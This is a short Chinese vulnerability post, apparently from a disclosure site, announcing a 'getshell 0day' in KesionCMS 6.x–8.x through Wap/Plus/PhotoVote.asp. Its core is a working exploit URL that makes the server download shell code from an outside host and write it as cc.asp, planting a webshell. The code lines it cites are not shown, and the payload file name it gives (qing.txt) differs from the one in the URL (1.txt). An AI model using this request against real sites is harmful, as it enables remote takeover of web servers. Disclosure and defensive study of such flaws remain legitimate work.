科讯 6.x~8.x getshell 0day

未对提交参数判断,导致可以写任意文件到服务器上...

详细说明:

Wap/Plus/PhotoVote.asp 14 - 23

上面的代码中这几句:

漏洞证明:

登陆后访问:
http://127.0.0.1/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.site.com/1.txt
成功会在Wap/Plus下写入cc.asp,并返回文件名,其中的qing.txt为shell代码。。




评论 (0)